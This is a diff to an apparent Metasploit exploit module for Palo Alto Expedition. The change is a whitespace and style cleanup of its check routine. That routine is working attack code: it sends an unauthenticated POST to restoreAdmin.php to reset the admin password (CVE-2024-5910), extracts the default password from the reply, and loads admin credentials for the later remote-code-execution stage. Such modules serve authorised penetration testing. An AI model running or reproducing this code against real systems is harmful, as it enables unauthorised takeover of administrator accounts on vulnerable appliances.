diff --git a/modules/exploits/linux/http/paloalto_expedition_rce.rb b/modules/exploits/linux/http/paloalto_expedition_rce.rb
index 5ff4479b13a2..13a785bbe6ff 100644
--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -102,28 +102,28 @@ def xsrf_token_value
 
   def check
     unless datastore['USERNAME'] && datastore['PASSWORD']
-        unless  datastore['RESET_ADMIN_PASSWD']
-           print_bad("No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.")
-           return CheckCode::Unknown
-        end
-
-        res = send_request_cgi(
-            'method' => 'POST',
-            'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
-          )
-    
-          return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
-    
-          if res.code == 403
-            return CheckCode::Safe
-          end
-    
-          return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
-    
-          respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
-          print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
-          datastore['PASSWORD'] = respass
-          datastore['USERNAME'] = 'admin'
+      unless datastore['RESET_ADMIN_PASSWD']
+        print_bad('No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.')
+        return CheckCode::Unknown
+      end
+
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+      )
+
+      return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
+
+      if res.code == 403
+        return CheckCode::Safe
+      end
+
+      return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
+
+      respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓	Admin password restored to:    'paloalto'
+      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+      datastore['PASSWORD'] = respass
+      datastore['USERNAME'] = 'admin'
     end
 
     begin